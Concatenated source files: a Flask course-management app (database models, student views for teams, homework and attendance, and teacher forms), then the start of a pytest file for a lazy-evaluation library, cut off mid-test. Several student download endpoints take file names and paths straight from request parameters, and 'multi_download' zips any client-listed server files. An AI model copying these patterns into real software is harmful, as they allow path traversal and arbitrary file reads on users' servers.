self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
def check_id(self):
return self.id
@staticmethod
def user_type():
return 0
@staticmethod
def init_dean():
"""野兽先辈管理员说"""
dean = DeanInfo.query.first()
if dean is None:
dean = DeanInfo(id=810)
dean.password = '<PASSWORD>'
db.session.add(dean)
db.session.commit()
def __repr__(self):
return '<DeanInfo %r>' % self.id
class Semester(db.Model):
__tablename__ = 'semesters'
id = db.Column(db.Integer, primary_key=True)
base_info = db.Column(db.Text)
begin_time = db.Column(db.Date)
end_time = db.Column(db.Date)
def __repr__(self):
return '<Semester %r>' % self.id
class Student(UserMixin, db.Model):
__tablename__ = 'students'
id = db.Column(db.Integer, primary_key=True)
password_hash = db.Column(db.String(128))
name = db.Column(db.VARCHAR(length=50, convert_unicode=True))
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
@staticmethod
def init_student():
student = Student.query.first()
if student is None:
student = Student(id=666)
student.password = '<PASSWORD>'
db.session.add(student)
db.session.commit()
@staticmethod
def user_type():
return 2
def __repr__(self):
return '<Student %r>' % self.id
class Team(db.Model):
__tablename__ = 'teams'
id = db.Column(db.Integer, primary_key=True)
owner_id = db.Column(db.Integer, db.ForeignKey('students.id'))
owner_grade = db.Column(db.Float, default=0)
team_name = db.Column(db.VARCHAR(length=50, convert_unicode=True))
status = db.Column(db.Integer, default=0) # 0: building 1: pending 2: accepted 3: rejected 4: dismiss
reject_reason = db.Column(db.Text)
course_id = db.Column(db.Integer, db.ForeignKey('courses.id'))
members = db.relationship('TeamMember', backref='team')
owner = db.relationship('Student', uselist=False)
submissions = db.relationship('Submission', backref='team')
@property
def number_of_members(self):
return len([a for a in self.members if a.status == 1]) + 1
def __repr__(self):
return '<Team %r>' % self.id
@property
def order(self):
return Team.query.filter_by(course_id=self.course_id).all().index(self)
@staticmethod
def team_list(course_id):
teams = Team.query.filter_by(course_id=course_id).all()
order = 1
for team in teams:
            team.order = order  # attach an order (sequence) attribute to each returned team
order += 1
return teams
class TeamMember(db.Model):
__tablename__ = 'team_members'
id = db.Column(db.Integer, primary_key=True)
student_id = db.Column(db.Integer, db.ForeignKey('students.id'))
team_id = db.Column(db.Integer, db.ForeignKey('teams.id'))
status = db.Column(db.Integer, default=0) # 0: pending 1: accepted 2: rejected
grade = db.Column(db.Float, default=0)
student = db.relationship('Student', uselist=False)
def __repr__(self):
return '<TeamMember %r>' % self.id
class Homework(db.Model):
__tablename__ = 'homework'
id = db.Column(db.Integer, primary_key=True)
course_id = db.Column(db.Integer, db.ForeignKey('courses.id'))
name = db.Column(db.VARCHAR(length=50, convert_unicode=True))
base_requirement = db.Column(db.Text)
begin_time = db.Column(db.DateTime)
end_time = db.Column(db.DateTime)
weight = db.Column(db.Integer)
max_submit_attempts = db.Column(db.Integer)
submissions = db.relationship('Submission', backref='homework')
def __repr__(self):
return '<Homework %r>' % self.id
@property
def order(self):
return Homework.query.filter_by(course_id=self.course_id).all().index(self)
@staticmethod
def homework_list(course_id):
homeworks = Homework.query.filter_by(course_id=course_id).all()
order = 1
for homework in homeworks:
            homework.order = order  # attach an order (sequence) attribute to each returned homework
order += 1
return homeworks
class Submission(db.Model): # 学生提交作业信息
__tablename__ = 'submissions'
id = db.Column(db.Integer, primary_key=True)
homework_id = db.Column(db.Integer, db.ForeignKey('homework.id'))
team_id = db.Column(db.Integer, db.ForeignKey('teams.id'))
submitter_id = db.Column(db.Integer, db.ForeignKey('students.id'))
text_content = db.Column(db.Text)
score = db.Column(db.Integer)
comments = db.Column(db.Text)
submit_attempts = db.Column(db.Integer)
    submit_status = db.Column(db.Integer)  # 0: submitted, not yet graded  1: graded
def __repr__(self):
return '<Submission %r>' % self.id
class Attachment(db.Model): # 学生提交作业附件信息
__tablename__ = 'attachments'
id = db.Column(db.Integer, primary_key=True)
submission_id = db.Column(db.Integer, db.ForeignKey('submissions.id'))
guid = db.Column(db.Text)
file_name = db.Column(db.String(128))
upload_time = db.Column(db.DateTime)
status = db.Column(db.Boolean)
submission = db.relationship('Submission', backref='attachment', uselist=False)
def __repr__(self):
return '<Attachment %r>' % self.id
class Course(db.Model):
__tablename__ = 'courses'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50))
semester_id = db.Column(db.Integer, db.ForeignKey('semesters.id'))
course_info = db.Column(db.Text)
place = db.Column(db.String(50))
outline = db.Column(db.Text)
credit = db.Column(db.Integer)
teamsize_max = db.Column(db.Integer)
teamsize_min = db.Column(db.Integer)
status = db.Column(db.Boolean)
upload_time = db.Column(db.String(128))
students = db.relationship('Student', secondary=SCRelationship, backref='courses')
teachers = db.relationship('Teacher', secondary=TCRelationship, backref='courses')
no_miss = db.Column(db.Integer)
miss_1 = db.Column(db.Integer)
miss_2 = db.Column(db.Integer)
miss_3 = db.Column(db.Integer)
miss_4 = db.Column(db.Integer)
miss_5 = db.Column(db.Integer)
def __repr__(self):
return '<Course %r>' % self.id
class CourseTime(db.Model):
__tablename__ = 'course_time'
id = db.Column(db.Integer, primary_key=True)
course_id = db.Column(db.Integer, db.ForeignKey('courses.id'))
start_week = db.Column(db.Integer)
start_section = db.Column(db.Integer)
finish_section = db.Column(db.Integer)
def __repr__(self):
return '<CourseTime %r>' % self.id
class Teacher(UserMixin, db.Model):
__tablename__ = 'teachers'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(128))
password_hash = db.Column(db.String(128))
teacher_info = db.Column(db.Text)
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
@staticmethod
def init_teacher():
teacher = Teacher.query.first()
if teacher is None:
teacher = Teacher(id=777)
teacher.password = '<PASSWORD>'
db.session.add(teacher)
db.session.commit()
@staticmethod
def user_type():
return 1
def __repr__(self):
return '<Teacher %r>' % self.id
@login_manager.user_loader
def load_user(user_id):
if 'user_type' not in session:
return None
elif session['user_type'] == 'dean':
temp = DeanInfo.query.get(int(user_id))
elif session['user_type'] == 'teacher':
temp = Teacher.query.get(int(user_id))
elif session['user_type'] == 'student':
temp = Student.query.get(int(user_id))
return temp
class ChatMessage(db.Model):
__tablename__ = 'chat_message'
id = db.Column(db.Integer, primary_key=True)
course_id = db.Column(db.Integer, db.ForeignKey('courses.id'))
    student_id = db.Column(db.Integer, db.ForeignKey('students.id'))  # 0 means not sent by a student; > 0 is the id of the student who sent it
    teacher_id = db.Column(db.Integer, db.ForeignKey('teachers.id'))  # likewise for messages sent by a teacher
time = db.Column(db.DateTime)
    content = db.Column(db.String(256))  # tentatively limited to 256 characters
markdown = db.Column(db.Boolean)
student = db.relationship('Student', uselist=False)
teacher = db.relationship('Teacher', uselist=False)
def __repr__(self):
return '<ChatMessage %r>' % self.id
class Attendance(db.Model):
__tablename__ = 'attendance'
id = db.Column(db.Integer, primary_key=True)
course_id = db.Column(db.Integer, db.ForeignKey('courses.id'))
    time_begin = db.Column(db.DateTime)  # time the teacher opened the attendance check
    time_end = db.Column(db.DateTime)  # students may check in until this time
    info = db.Column(db.Text)  # free-form note
def __repr__(self):
return '<Attendance %r>' % self.id
@property
def order(self):
return Attendance.query.filter_by(course_id=self.course_id).all().index(self)
@staticmethod
def attendance_list(course_id):
attendances = Attendance.query.filter_by(course_id=course_id).all()
order = 1
for attendance in attendances:
            attendance.order = order  # attach an order (sequence) attribute to each returned attendance
order += 1
return attendances
class AttendanceStats(db.Model):
__tablename__ = 'attendance_stats'
id = db.Column(db.Integer, primary_key=True)
attendance_id = db.Column(db.Integer, db.ForeignKey('attendance.id'))
student_id = db.Column(db.Integer, db.ForeignKey('students.id'))
    time = db.Column(db.DateTime)  # time at which the student checked in
def __repr__(self):
return '<AttendanceStats %r>' % self.id
# Bonus-point items
class Plus(db.Model):
__tablename__ = 'plus'
id = db.Column(db.Integer, primary_key=True)
course_id = db.Column(db.Integer, db.ForeignKey('courses.id'))
name = db.Column(db.String(256))
weight = db.Column(db.Integer)
teams = db.relationship('TeamPlus', backref='plus')
class TeamPlus(db.Model):
__tablename__ = 'team_plus'
id = db.Column(db.Integer, primary_key=True)
plus_id = db.Column(db.Integer, db.ForeignKey('plus.id'))
team_id = db.Column(db.Integer, db.ForeignKey('teams.id'))
score = db.Column(db.Integer)
team = db.relationship('Team', backref='teamplus', uselist=False)
```
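`load_user` above dispatches on `session['user_type']`, so whichever view performs login has to set that key before calling `login_user`. A hypothetical sketch of that contract (the login route and form handling are omitted):
```python
# Hypothetical login helper illustrating the session['user_type'] contract used by load_user.
from flask import session
from flask_login import login_user

def log_in_student(student_id, password):
    student = Student.query.get(student_id)
    if student is not None and student.verify_password(password):
        session['user_type'] = 'student'   # must match one of the keys checked in load_user
        login_user(student)
        return True
    return False
```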
#### File: app/student/views.py
```python
import os
import zipfile
import shutil
from flask import render_template, flash, request, redirect, url_for, make_response, send_file, current_app, \
send_from_directory
from flask_login import login_required, current_user
from . import student
from ..auths import UserAuth
from ..models.models import *
from .forms import *
from flask_uploads import UploadNotAllowed
from openpyxl.utils.exceptions import InvalidFileException
import uuid
from config import basedir
from sqlalchemy import or_, and_
from datetime import datetime, timedelta
@student.before_request
@login_required
def before_request():
pass
@student.route('/')
def index():
courses = Student.query.filter_by(id=current_user.id).first().courses
return render_template('student/index.html', courses=courses)
def download_file(directory, filename):
response = make_response(send_from_directory(directory, filename, as_attachment=True))
response.headers["Content-Disposition"] = "attachment; filename={}".format(filename.encode().decode('latin-1'))
return response
# Provides a zip-packaging helper; adjust to the actual deployment as needed.
# filelist is a list containing the absolute paths of the target files.
# output_filename is the name of the resulting zip file.
@student.route('/student/*****', methods=['GET'])
@UserAuth.student_course_access
def multi_download():
filelist = request.args.get('filelist')
output_filename = request.args.get('output_filename')
zipf = zipfile.ZipFile(output_filename, 'w')
[zipf.write(filename, filename.rsplit(os.path.sep, 1)[-1]) for filename in filelist]
zipf.close()
response = make_response(send_file(os.path.join(os.getcwd(), output_filename)))
response.headers["Content-Disposition"] = "attachment; filename="+output_filename+";"
return response
@student.route('/student/<course_id>/<file_name>', methods=['GET'])
@UserAuth.student_course_access
def download_resource(course_id, file_name):
    # The path used here is an example; adjust it to the real storage path.
    # Check whether the file exists
if os.path.isfile(os.path.join(os.getcwd(), 'uploads', str(file_name))):
response = make_response(send_file(os.path.join(os.getcwd(), 'uploads', str(file_name))))
else:
flash('选择的文件不存在')
return redirect(url_for('index'))
response.headers["Content-Disposition"] = "attachment; filename="+str(file_name)+";"
return response
def attendance_available(course_id):
attencence_list = Attendance.query.filter_by(course_id=course_id).all()
if not attencence_list:
        return False  # no attendance check has been published
last_attendance = attencence_list[-1]
    if last_attendance.time_end > datetime.now():  # check-in window is still open
_attendance = AttendanceStats.query.filter_by(attendance_id=last_attendance.id, student_id=current_user.id).first()
if not _attendance:
return True
return False
def submit_attendance(course_id):
    # Student submits an attendance check-in
attencence_list = Attendance.query.filter_by(course_id=course_id).all()
if not attencence_list:
flash("当前没有签到", "danger")
        return False  # no attendance check has been published
last_attendance = attencence_list[-1]
    _attendance_available = last_attendance.time_end > datetime.now()  # check-in window is still open
if not _attendance_available:
flash("当前没有签到", "danger")
return False
_attendance = AttendanceStats.query.filter_by(attendance_id=last_attendance.id, student_id=current_user.id).first()
if _attendance:
flash("已经签过到", "info")
return False
new_attendance = AttendanceStats()
new_attendance.student_id = current_user.id
new_attendance.time = datetime.now()
new_attendance.attendance_id = last_attendance.id
db.session.add(new_attendance)
db.session.commit()
flash("签到成功", "success")
return True
@student.route('/<course_id>/course', methods=['GET', 'POST'])
@UserAuth.student_course_access
def show_course_info(course_id):
    # Student views course information
course = Course.query.filter_by(id=course_id).first()
outlet_attachment = None
filedir = os.path.join(basedir, 'uploads', str(course_id))
if not os.path.exists(filedir):
os.mkdir(filedir)
for file in os.listdir(filedir):
try:
name, _ = file.split('.')
if name == 'outlet':
outlet_attachment = file
break
except ValueError:
pass
if request.args.get('action') == 'download':
return send_from_directory(filedir, outlet_attachment, as_attachment=True)
if request.form.get('action') == 'sign_up':
submit_attendance(course_id)
_attendance_available = attendance_available(course_id)
return render_template('student/course.html',
course_id=course_id,
course=course,
attendance_available=_attendance_available,
nav='show_course_info',
outlet_attachment=outlet_attachment)
@student.route('/<course_id>/resource', methods=['GET'])
@UserAuth.student_course_access
def show_resource(course_id):
    # Student views course resources
course = Course.query.filter_by(id=course_id).first()
path = request.args.get('path')
if not path:
return redirect(url_for('student.show_resource', course_id=course_id, path='/'))
expand_path = os.path.join(current_app.config['UPLOADED_FILES_DEST'], 'resource', course_id, path[1:])
if not os.path.exists(expand_path):
        # Directory missing, so create it on the fly
os.mkdir(expand_path)
if request.args.get('download'):
        # Download the requested file
filedir = os.path.join(
current_app.config['UPLOADED_FILES_DEST'],
'resource',
course_id,
path[1:])
filename = request.args.get('filename')
print(filename)
if os.path.exists(os.path.join(filedir, filename)):
return download_file(filedir, filename)
else:
flash('文件不存在!', 'danger')
return redirect(url_for('teacher.manage_resource', course_id=course_id, path=path))
files = []
def sizeof_fmt(num, suffix='B'):
for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Y', suffix)
class file_attributes:
name = ""
size = ""
create_time = datetime.min
is_dir = False
is_file = False
def __init__(self, name, size, create_time, is_dir, is_file):
self.name = name
self.size = size
self.create_time = create_time
self.is_dir = is_dir
self.is_file = is_file
for file in os.scandir(expand_path):
time = datetime.fromtimestamp(file.stat().st_mtime)
files.append(file_attributes(file.name, sizeof_fmt(file.stat().st_size), time, file.is_dir(), file.is_file()))
return render_template('student/resource.html', course_id=course_id, course=course, path=path, files=files, nav='show_resource')
@student.route('/<course_id>/grade', methods=['GET', 'POST'])
def team_grade(course_id):
    # Grade the members of the team
team = Team.query.filter_by(owner_id=current_user.id, course_id=course_id).first()
if not team:
team = Team.query.filter_by(course_id=course_id).filter(Team.members.any(student_id=current_user.id)).first()
if not team or not team.status == 2:
flash('你还没有加组/你的组还没通过审批!', 'danger')
return redirect(url_for('student.team_view', course_id=course_id))
    # TeamMember.student grades are used for display
    student_list = []
    # Include the team owner's id and grade
student_list.append({'student_id': team.owner_id,
'student_name': team.owner.name,
'student_grade': team.owner_grade})
    # student_list is used to display the grades on the grading page
for i in team.members:
student_temp = Student.query.filter_by(id=i.student_id).first()
# student_list.append({student_temp.name: i.grade})
student_list.append({'student_id': student_temp.id,
'student_name': student_temp.name,
'student_grade': i.grade})
    # Cases in which grading is not allowed
if request.method == 'POST':
if current_user.id != team.owner_id:
flash('权限不足,只有组长可以打分', 'danger')
return redirect(url_for('student.team_grade', course_id=course_id))
else:
try:
# request.form: {student_id: grade}
sum_total = 0
                # set the team owner's grade
sum_total += float(request.form.get(str(team.owner_id)))
                # set the team members' grades
for student_t in team.members:
sum_total = sum_total + float(request.form.get(str(student_t.student_id)))
if sum_total == len(student_list):
team.owner_grade = float(request.form.get(str(team.owner_id)))
db.session.add(team)
for student_t in team.members:
student_t.grade = float(request.form.get(str(student_t.student_id)))
db.session.add(student_t)
db.session.commit()
flash('设置成功', 'success')
return redirect(url_for('student.team_grade', course_id=course_id))
else:
flash('所有人的得分系数平均为1', 'danger')
return redirect(url_for('student.team_grade', course_id=course_id))
except ValueError:
flash('不能为空', 'danger')
return redirect(url_for('student.team_grade', course_id=course_id))
return render_template('student/team_score.html', student_list=student_list, course_id=course_id, team=team, nav='team_grade')
@student.route('/<course_id>/teams', methods=['GET', 'POST'])
def team_view(course_id):
form = CreateTeamForm()
    # Is the current user the owner of a team?
team_owner = Team.query.filter_by(owner_id=current_user.id, course_id=course_id).first()
    # Has the current user already joined a team?
team_joined = TeamMember\
.query\
.filter_by(student_id=current_user.id, status=1)\
.join(Team)\
.filter(Team.course_id == course_id)\
.first()
    # Does the current user have a pending join request?
team_pending = TeamMember\
.query\
.filter_by(student_id=current_user.id, status=0) \
.join(Team) \
.filter(Team.course_id == course_id) \
.first()
if request.form.get('action') == 'join':
        # Join a team
member_list = TeamMember.query.filter_by(team_id=request.form.get('team_id')).filter_by(status=1).all()
number_of_member = len(member_list)
_course = Course.query.filter_by(id=course_id).first()
if team_owner:
flash('已创建团队,拒绝申请!', 'danger')
elif team_joined:
flash('已加入团队,拒绝申请!', 'danger')
elif number_of_member == _course.teamsize_max - 1:
flash('人数已满,拒绝申请!', 'danger')
elif team_pending:
flash('提交申请待审批,拒绝申请!', 'danger')
else:
teammember = TeamMember()
teammember.team_id = request.form.get('team_id')
teammember.student_id = current_user.id
teammember.status = 0
db.session.add(teammember)
            # Student team management requires deleting previously rejected records
delete_list = TeamMember.query.filter_by(status=2).filter_by(student_id=current_user.id).all()
for record in delete_list:
db.session.delete(record)
db.session.commit()
flash('申请加入成功!', 'success')
return redirect(url_for('student.team_view', course_id=course_id))
elif request.form.get('action') == 'cancel':
        # Cancel the join request
delete_teammember = TeamMember.query.filter_by(student_id=current_user.id).first()
db.session.delete(delete_teammember)
db.session.commit()
flash('取消成功!', 'success')
return redirect(url_for('student.team_view', course_id=course_id))
if form.validate_on_submit():
        # Create a team
if team_owner:
flash('已创建团队,无法再次创建!', 'danger')
elif team_joined:
flash('已加入团队,无法再次创建!', 'danger')
elif team_pending:
flash('提交申请待审批,拒绝申请!', 'danger')
else:
team = Team()
team.status = 0
team.course_id = course_id
team.owner_id = current_user.id
team.team_name = form.team_name.data
db.session.add(team)
db.session.commit()
delete_list = TeamMember.query.filter_by(status=2).filter_by(student_id=current_user.id).all()
for record in delete_list:
db.session.delete(record)
db.session.commit()
flash('创建团队成功!', 'success')
return redirect(url_for('student.team_view', course_id=course_id))
team_list = Team.query.filter_by(course_id=course_id).filter(or_(Team.status == 0, Team.status == 3)).all()
return render_template('student/team.html',
teams=team_list,
form=form,
course_id=course_id,
unjoinable=team_owner or team_joined or team_pending,
pending=team_pending,
nav='team_view')
@student.route('/<course_id>/my_team', methods=['GET', 'POST'])
def my_team(course_id):
    # Team management
student_id = current_user.id
    team = Team.query.filter_by(owner_id=student_id, course_id=course_id).first()  # check whether the current user is a team owner
teammate_list = []
member_status = None
if not team:
        # If the current user is not a team owner
member = TeamMember \
.query \
.filter_by(student_id=student_id) \
.join(Team, TeamMember.team_id == Team.id)\
.filter(Team.course_id == course_id) \
.first()
if member:
team = Team.query.filter_by(id=member.team_id).first()
member_status = member.status
if team:
teammate_list = team.members
for member in teammate_list:
            # if member.status == 2:  # drop rejected members
# teammate_list.remove(member)
# continue
            member.real_name = member.student.name  # the front end uses member.status to show accept/reject
if team and request.form.get('action'):
if request.form.get('action') == 'accept':
            # Accept a member
member = TeamMember.query.filter_by(student_id=request.form.get('member_id')).first()
member.status = 1 # 1: Accepted
db.session.add(member)
db.session.commit()
flash('接受成功', 'success')
elif request.form.get('action') == 'reject':
            # Reject a member
member = TeamMember.query.filter_by(student_id=request.form.get('member_id')).first()
member.status = 2 # 2: Rejected
db.session.add(member)
db.session.commit()
flash('拒绝成功', 'success')
elif request.form.get('action') == 'submit':
            # Submit the team for approval
_course = Course.query.filter_by(id=course_id).first()
if team.number_of_members + 1 <= _course.teamsize_min:
flash('人数不足', 'danger')
else:
team.status = 1 # 1: pending
for member in teammate_list:
if member.status == 0: # 0: Pending
member.status = 2 # 2: Rejected
db.session.add(member)
db.session.add(team)
db.session.commit()
flash('已提交申请', 'success')
elif request.form.get('action') == 'dismiss':
            # Disband the team
for member in teammate_list:
db.session.delete(member)
db.session.delete(team)
db.session.commit()
flash('队伍已解散', 'success')
elif request.form.get('action') == 'reset':
team.status = 0
db.session.add(team)
db.session.commit()
return redirect(url_for('student.my_team', course_id=course_id))
return render_template('student/team_manage.html',
team=team,
course_id=course_id,
member_status=member_status,
nav='my_team')
@student.route('/<int:course_id>/homework')
@UserAuth.student_course_access
def homework(course_id):
    # Student views the homework list
course = Course.query.filter_by(id=course_id).first()
homework_list = Homework.query.filter_by(course_id=course_id).all()
return render_template('student/homework.html', course_id=course_id, homeworks=homework_list, course=course, nav='homework')
@student.route('/<int:course_id>/homework/<int:homework_id>/attachment/<int:team_id>/#', methods=['GET', 'POST'])
@UserAuth.student_course_access
def download_attachment(course_id, homework_id, team_id, filename):
file_dir = os.path.join(current_app.config['UPLOADED_FILES_DEST'],
str(course_id),
str(homework_id),
str(team_id))
    # Take the most recent submission and its attachment
print(team_id)
print(Team.query.filter_by(id=team_id).all())
attachment_previous = Team \
.query \
.filter_by(id=team_id) \
.filter(Team.submissions.any(homework_id=homework_id)) \
.first() \
.submissions[-1] \
.attachment[0]
filename_upload = attachment_previous.file_name
file_uuid = attachment_previous.guid
    # Find the file saved under its uuid in the storage directory
for i in os.listdir(file_dir):
if i.startswith(str(file_uuid)):
os.rename(os.path.join(file_dir, i), os.path.join(file_dir, filename_upload))
return download_file(file_dir, filename_upload)
@student.route('/<int:course_id>/homework/<int:homework_id>', methods=['GET', 'POST'])
@UserAuth.student_course_access
def homework_detail(course_id, homework_id):
    # Detailed homework information
form = HomeworkForm()
course = Course.query.filter_by(id=course_id).first()
homework = Homework.query.filter_by(id=homework_id).first()
team = Team.query.filter_by(owner_id=current_user.id, course_id=course_id).first()
# team_list = Team.query.filter_by(course_id=course_id).all()
# team_id_list = [(a.id for a in team_list)]
ren = TeamMember.query.filter_by(student_id=current_user.id).\
filter(TeamMember.team.has(course_id=course_id)).first()
# student_list_query = TeamMember.query.filter(TeamMember.id.in_(team_id_list))
# print(student_list_query)
# student_list = student_list_query.all()
# student_id_list = [(a.id for a in student_list)]
if not team:
if not ren or current_user.id != ren.student_id:
flash('请先加入团队', 'danger')
return redirect(url_for('student.homework', course_id=course_id))
else:
team = ren.team
attempts = len(Submission.query.filter_by(team_id=team.id, homework_id=homework_id).all())
# begin_time = homework.begin_time
# end_time = homework.end_time
#
# if begin_time > datetime.now():
# flash('还没到作业的开始时间!', 'danger')
# return redirect(url_for('student.homework', course_id=course_id))
# if end_time < datetime.now():
# flash('作业结束时间已过!', 'danger')
# return redirect(url_for('student.homework', course_id=course_id))
if form.validate_on_submit():
        # Cases in which submission is not allowed
if current_user.id != team.owner_id:
flash('只有队长可以管理作业!', 'danger')
return redirect(url_for('student.homework', course_id=course_id))
if attempts >= homework.max_submit_attempts:
flash('提交已达最大次数,无法提交', 'danger')
return redirect(url_for('student.homework_detail', course_id=course_id, homework_id=homework_id))
submission = Submission()
        submission.homework_id = homework.id
submission.team_id = team.id
submission.text_content = form.text.data
submission.submitter_id = current_user.id
submission.score = 0
db.session.add(submission)
        db.session.commit()  # commit so that submission.id is generated
        # Each new submission removes the attachments of the previous one
path = os.path.join(basedir, 'uploads', str(course_id),
str(homework_id), str(team.id))
# for i in os.listdir(path=path):
# os.remove(os.path.join(path + '\\' + str(i)))
if os.path.exists(path):
shutil.rmtree(path)
if form.homework_up.data:
            # Save to uploads/<course-id>/<homework-id>/<team-id>
guid = uuid.uuid4()
try:
(name_temp, ext) = os.path.splitext(form.homework_up.data.filename)
homework_ups.save(form.homework_up.data,
folder=os.path.join(basedir, 'uploads', str(course_id),
str(homework_id), str(team.id)),
name=str(guid) + ext)
except UploadNotAllowed:
flash('附件上传不允许!', 'danger')
return redirect(url_for('student.homework_detail', course_id=course_id, homework_id=homework_id))
except InvalidFileException:
flash('附件类型不正确!', 'danger')
return redirect(url_for('main.submit_homework', course_id=course_id, homework_id=homework_id))
attachment = Attachment()
attachment.submission_id = submission.id
attachment.guid = str(guid)
attachment.upload_time = datetime.now()
            # keep the original file name and extension
attachment.file_name = str(name_temp) + ext
db.session.add(attachment)
db.session.commit()
flash('提交成功!', 'success')
return redirect(url_for('student.homework_detail', course_id=course_id, homework_id=homework_id))
teacher_corrected = False
corrected_file_dir = os.path.join(basedir, 'uploads', str(course_id), str(homework_id))
corrected_file_path = os.path.join(corrected_file_dir, 'teacher_corrected.zip')
if os.path.exists(corrected_file_path):
teacher_corrected = True
if request.args.get('action') == 'download_corrected':
return download_file(corrected_file_dir, 'teacher_corrected.zip')
    # look up the most recent previous submission
submission_previous = Submission\
.query\
.filter_by(team_id=team.id,
homework_id=homework_id)\
.order_by(Submission.id.desc())\
.first()
attachment_previous = None
if submission_previous:
attachment_previous = Attachment.query.filter_by(submission_id=submission_previous.id).first()
    # fetch the current homework
homework_temp = Homework.query.filter_by(id=homework_id).first()
begin_time = homework_temp.begin_time
end_time = homework_temp.end_time
current_time = datetime.now()
return render_template('student/homework_detail.html',
course_id=course_id,
course=course,
homework=homework,
submission_previous=submission_previous,
attachment_previous=attachment_previous,
form=form,
team=team,
attempts=attempts,
teacher_corrected=teacher_corrected,
begin_time=begin_time,
end_time=end_time,
current_time=current_time,
nav='homework')
```
#### File: app/teacher/forms.py
```python
from flask_wtf import FlaskForm
from wtforms import TextAreaField, IntegerField, StringField, SubmitField, SelectField
from wtforms.validators import InputRequired, DataRequired, NumberRange
from flask_uploads import UploadSet
from flask_wtf.file import FileField, FileAllowed, FileRequired
upsr = UploadSet('files', extensions=('xls', 'xlsx', 'pdf', 'doc', 'docx', 'txt', 'zip', '7z', 'rar'))
up_corrected = UploadSet('files', extensions=('zip', 'rar'))
class CourseForm(FlaskForm):
outline = TextAreaField('课程大纲', validators=[InputRequired()])
outlet_attachment = FileField('大纲附件')
teamsize_max = IntegerField('课程人数上限', validators=[DataRequired(), NumberRange(min=1, message='至少需要一个人')])
teamsize_min = IntegerField('课程人数下限', validators=[DataRequired(), NumberRange(min=1, message='至少需要一个人')])
no_miss = IntegerField('全勤分数', validators=[InputRequired(), NumberRange(min=0, max=100, message='分数在0-100')])
miss_1 = IntegerField('一次缺勤', validators=[InputRequired(), NumberRange(min=0, max=100, message='分数在0-100')])
miss_2 = IntegerField('两次缺勤', validators=[InputRequired(), NumberRange(min=0, max=100, message='分数在0-100')])
miss_3 = IntegerField('三次缺勤', validators=[InputRequired(), NumberRange(min=0, max=100, message='分数在0-100')])
miss_4 = IntegerField('四次缺勤', validators=[InputRequired(), NumberRange(min=0, max=100, message='分数在0-100')])
miss_5 = IntegerField('五次及以上缺勤', validators=[InputRequired(), NumberRange(min=0, max=100, message='分数在0-100')])
def validate(self):
if not super(CourseForm, self).validate():
return False
if not self.teamsize_min.data <= self.teamsize_max.data:
self.teamsize_min.errors.append('下限人数不多于上限')
self.teamsize_max.errors.append('上限人数不少于下限')
return False
return True
class HomeworkForm(FlaskForm):
name = StringField('作业名', validators=[DataRequired()])
base_requirement = TextAreaField('作业要求', validators=[DataRequired()])
time = StringField('持续时间', validators=[DataRequired()])
weight = IntegerField('权重', validators=[DataRequired()])
max_submit_attempts = IntegerField('最大提交次数', validators=[DataRequired()])
class UploadResourceForm(FlaskForm):
up = FileField(validators=[
FileAllowed(upsr, u'xls, xlsx, pdf, doc, docx, txt, zip, 7z, rar'),
FileRequired(u'文件未选择!')])
submit = SubmitField(u'上传')
class UploadCorrected(FlaskForm):
up_corrected = FileField(validators=[FileAllowed(up_corrected, u'zip and rar only'),
FileRequired(u'文件未选择!')])
submit = SubmitField(u'上传')
class AcceptTeam(FlaskForm):
id = IntegerField(validators=[InputRequired()])
# button = SubmitField('通过')
class RejectTeam(FlaskForm):
id = IntegerField(validators=[InputRequired()])
# button = SubmitField('拒绝')
reason = TextAreaField('拒绝理由', validators=[InputRequired()])
class MoveForm(FlaskForm):
student = IntegerField('学生id', validators=[DataRequired()])
pending_teams = SelectField('可以加入的组',
choices=[],
coerce=int)
class AttendanceForm(FlaskForm):
info = StringField("备注")
time_delta = IntegerField("签到开放时长")
class PlusForm(FlaskForm):
name = StringField('加分项名', validators=[DataRequired()])
weight = StringField('加分最大分值', validators=[DataRequired()])
``` |
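`CourseForm.validate` above layers a cross-field check (the team size lower bound must not exceed the upper bound) on top of the per-field validators by overriding `validate()` and appending errors to both fields. A self-contained sketch of the same pattern with plain `wtforms`; the form and field names here are illustrative, not part of the project:
```python
# Minimal sketch of the cross-field validate() pattern used by CourseForm.
from wtforms import Form, IntegerField
from wtforms.validators import DataRequired

class SizeForm(Form):
    low = IntegerField('low', validators=[DataRequired()])
    high = IntegerField('high', validators=[DataRequired()])

    def validate(self):
        if not super(SizeForm, self).validate():
            return False
        if not self.low.data <= self.high.data:
            self.low.errors.append('low must not exceed high')
            return False
        return True

form = SizeForm(data={'low': 5, 'high': 2})
print(form.validate())   # False: the cross-field check failed
print(form.errors)       # {'low': ['low must not exceed high']}
```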
{
"source": "jqqqqqqqqqq/python-lazy-async",
"score": 3
} |
#### File: python-lazy-async/tests/test_all.py
```python
import pytest
import asyncio
from lazy_async import lazy, lazy_property, lazy_async, lazy_property_async
from threading import Thread
import time
class ExampleClass:
def __init__(self):
self.sync_called = 0
self.async_called = 0
self.prop = 'nothing'
@lazy
def func1(self):
time.sleep(5)
self.sync_called += 1
return 'something'
@lazy_async
async def func2(self):
await asyncio.sleep(5)
self.async_called += 1
return 'something'
@lazy
def func3(self):
time.sleep(5)
raise ValueError('SomeException')
@lazy_async
async def func4(self):
await asyncio.sleep(5)
raise ValueError('SomeException')
@lazy_property
def func5(self):
time.sleep(5)
self.sync_called += 1
return self.prop
@func5.setter
def func5(self, value):
self.prop = value
@lazy_property_async
async def func6(self):
await asyncio.sleep(5)
self.async_called += 1
return self.prop
@func6.setter
def func6(self, value):
self.prop = value
def test_something_sync():
test_class = ExampleClass()
test1 = dict()
def start1():
test1[1] = test_class.func1()
def start2():
time.sleep(3)
test1[2] = test_class.func1()
def start3():
time.sleep(10)
test1[3] = test_class.func1()
Thread(target=start1).start()
Thread(target=start2).start()
Thread(target=start3).start()
time.sleep(1)
